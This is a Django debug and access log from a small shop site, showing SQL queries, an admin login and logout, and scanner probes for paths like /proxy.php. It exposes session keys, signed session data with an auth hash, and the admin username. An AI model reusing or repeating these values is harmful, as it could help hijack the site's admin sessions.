"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 21:01:37,996 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 21:01:38,001 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 21:01:38,006 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 21:01:38,015 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 21:01:38,018 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 21:01:38,022 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 21:01:38,025 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 21:01:38,029 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 21:01:38,034 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 21:01:38,041 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 21:01:38,047 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 21:01:38,052 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-30 21:01:38,057 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 21:01:38,061 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 21:01:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [30/Dec/2019 21:03:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:08:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:13:23] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:17:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 21:17:33,858 utils 2749 140297222735616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wrbe2h6fvpjo3wu8g0q3tkl54dqjudh6' LIMIT 1; args=('wrbe2h6fvpjo3wu8g0q3tkl54dqjudh6',) DEBUG 2019-12-30 21:17:33,861 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wrbe2h6fvpjo3wu8g0q3tkl54dqjudh6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T21:17:33.859628+00:00'::timestamptz); args=('wrbe2h6fvpjo3wu8g0q3tkl54dqjudh6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 21, 17, 33, 859628, tzinfo=)) [30/Dec/2019 21:17:33] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Dec/2019 21:18:25] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:22:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 21:22:38,793 utils 2749 140297222735616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tb2badpcqsj1wm80xlu19h9y9kr42tc4' LIMIT 1; args=('tb2badpcqsj1wm80xlu19h9y9kr42tc4',) DEBUG 2019-12-30 21:22:38,794 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tb2badpcqsj1wm80xlu19h9y9kr42tc4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T21:22:38.793522+00:00'::timestamptz); args=('tb2badpcqsj1wm80xlu19h9y9kr42tc4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 21, 22, 38, 793522, tzinfo=)) [30/Dec/2019 21:22:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Dec/2019 21:22:38] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [30/Dec/2019 21:22:38] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [30/Dec/2019 21:22:39] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [30/Dec/2019 21:22:39] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [30/Dec/2019 21:22:39] "GET /favicon.ico HTTP/1.0" 404 6346 [30/Dec/2019 21:22:39] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [30/Dec/2019 21:22:39] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 DEBUG 2019-12-30 21:22:49,066 utils 2749 140297233225472 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-30T21:22:49.050257+00:00'::timestamptz AND "django_session"."session_key" = 'tb2badpcqsj1wm80xlu19h9y9kr42tc4'); args=(datetime.datetime(2019, 12, 30, 21, 22, 49, 50257, tzinfo=), 'tb2badpcqsj1wm80xlu19h9y9kr42tc4') DEBUG 2019-12-30 21:22:49,073 utils 2749 140297233225472 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-30 21:22:49,345 utils 2749 140297233225472 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm' LIMIT 1; args=('2nwuho1qetbptfijzjreh3t28nxea8lm',) DEBUG 2019-12-30 21:22:49,346 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2nwuho1qetbptfijzjreh3t28nxea8lm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T21:22:49.345730+00:00'::timestamptz); args=('2nwuho1qetbptfijzjreh3t28nxea8lm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 21, 22, 49, 345730, tzinfo=)) DEBUG 2019-12-30 21:22:49,348 utils 2749 140297233225472 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'tb2badpcqsj1wm80xlu19h9y9kr42tc4'; args=('tb2badpcqsj1wm80xlu19h9y9kr42tc4',) DEBUG 2019-12-30 21:22:49,351 utils 2749 140297233225472 (0.003) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('tb2badpcqsj1wm80xlu19h9y9kr42tc4'); args=('tb2badpcqsj1wm80xlu19h9y9kr42tc4',) DEBUG 2019-12-30 21:22:49,355 utils 2749 140297233225472 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-30T21:22:49.353235+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 30, 21, 22, 49, 353235, tzinfo=), 6) DEBUG 2019-12-30 21:22:49,359 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-13T21:22:49.357545+00:00'::timestamptz WHERE "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 13, 21, 22, 49, 357545, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') [30/Dec/2019 21:22:49] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-30 21:22:49,461 utils 2749 140297233225472 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-30T21:22:49.446718+00:00'::timestamptz AND "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'); args=(datetime.datetime(2019, 12, 30, 21, 22, 49, 446718, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') DEBUG 2019-12-30 21:22:49,465 utils 2749 140297233225472 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-30 21:22:49,517 utils 2749 140297233225472 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-30 21:22:49,532 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-13T21:22:49.529514+00:00'::timestamptz WHERE "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 13, 21, 22, 49, 529514, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') [30/Dec/2019 21:22:49] "GET / HTTP/1.0" 200 8208 [30/Dec/2019 21:22:49] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [30/Dec/2019 21:22:49] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [30/Dec/2019 21:22:49] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [30/Dec/2019 21:22:49] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-30 21:23:22,540 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-30T21:23:22.530819+00:00'::timestamptz AND "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'); args=(datetime.datetime(2019, 12, 30, 21, 23, 22, 530819, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') DEBUG 2019-12-30 21:23:22,543 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-30 21:23:22,550 utils 2749 140297222735616 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-30 21:23:22,551 utils 2749 140297222735616 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-30 21:23:22,558 utils 2749 140297222735616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-30 21:23:22,700 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-13T21:23:22.697989+00:00'::timestamptz WHERE "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 13, 21, 23, 22, 697989, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') [30/Dec/2019 21:23:22] "GET /shop/product/ HTTP/1.0" 200 10007 [30/Dec/2019 21:23:22] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 [30/Dec/2019 21:23:22] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-30 21:23:22,823 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-30T21:23:22.814249+00:00'::timestamptz AND "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'); args=(datetime.datetime(2019, 12, 30, 21, 23, 22, 814249, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') DEBUG 2019-12-30 21:23:22,826 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [30/Dec/2019 21:23:22] "GET /jsi18n/ HTTP/1.0" 200 3223 [30/Dec/2019 21:23:22] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [30/Dec/2019 21:23:22] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [30/Dec/2019 21:23:22] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [30/Dec/2019 21:23:22] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [30/Dec/2019 21:23:22] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [30/Dec/2019 21:23:22] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [30/Dec/2019 21:23:22] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [30/Dec/2019 21:23:22] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [30/Dec/2019 21:23:22] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [30/Dec/2019 21:23:23] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [30/Dec/2019 21:23:23] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 [30/Dec/2019 21:23:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 21:24:08,461 utils 2749 140297212245760 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-30T21:24:08.451306+00:00'::timestamptz AND "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'); args=(datetime.datetime(2019, 12, 30, 21, 24, 8, 451306, tzinfo=), '2nwuho1qetbptfijzjreh3t28nxea8lm') DEBUG 2019-12-30 21:24:08,463 utils 2749 140297212245760 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-30 21:24:08,467 utils 2749 140297212245760 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = '2nwuho1qetbptfijzjreh3t28nxea8lm'; args=('2nwuho1qetbptfijzjreh3t28nxea8lm',) DEBUG 2019-12-30 21:24:08,469 utils 2749 140297212245760 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('2nwuho1qetbptfijzjreh3t28nxea8lm'); args=('2nwuho1qetbptfijzjreh3t28nxea8lm',) DEBUG 2019-12-30 21:24:08,485 utils 2749 140297212245760 (0.000) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'n8fa1v6iux6yfbk7gbf6hmwgvaqlmmvd' LIMIT 1; args=('n8fa1v6iux6yfbk7gbf6hmwgvaqlmmvd',) DEBUG 2019-12-30 21:24:08,486 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('n8fa1v6iux6yfbk7gbf6hmwgvaqlmmvd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T21:24:08.485400+00:00'::timestamptz); args=('n8fa1v6iux6yfbk7gbf6hmwgvaqlmmvd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 21, 24, 8, 485400, tzinfo=)) [30/Dec/2019 21:24:08] "GET /logout/ HTTP/1.0" 200 1180 [30/Dec/2019 21:28:51] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:34:00] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:39:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:44:17] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:49:26] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:54:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 21:59:45] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:04:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:15:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:20:27] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:25:37] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:30:46] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:35:56] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:41:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:47:49] "GET / HTTP/1.0" 302 0 [30/Dec/2019 22:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 22:52:52] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [30/Dec/2019 22:58:32] "GET /proxy.php HTTP/1.0" 404 6346 [30/Dec/2019 22:59:29] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 23:03:19] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [30/Dec/2019 23:03:20] "GET /dyzl/Print.asp?ArticleID=312 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [30/Dec/2019 23:03:22] "GET /xyzx/SendMail.asp?ArticleID=349 HTTP/1.0" 404 6376 [30/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:15:21] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:17:43] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:21:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:26:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:31:10] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:36:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:39:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:41:46] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:46:49] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:51:51] "GET / HTTP/1.0" 302 0 [30/Dec/2019 23:58:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:29:07] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:34:09] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:39:12] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:44:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:49:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 00:54:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 00:54:56,960 utils 2749 140297212245760 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w2h850g6unmu3xn05db7dm8nn8nf5qrj' LIMIT 1; args=('w2h850g6unmu3xn05db7dm8nn8nf5qrj',) DEBUG 2019-12-31 00:54:56,962 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w2h850g6unmu3xn05db7dm8nn8nf5qrj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T00:54:56.961160+00:00'::timestamptz); args=('w2h850g6unmu3xn05db7dm8nn8nf5qrj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 0, 54, 56, 961160, tzinfo=)) [31/Dec/2019 00:54:56] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 00:57:50] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 Not Found: 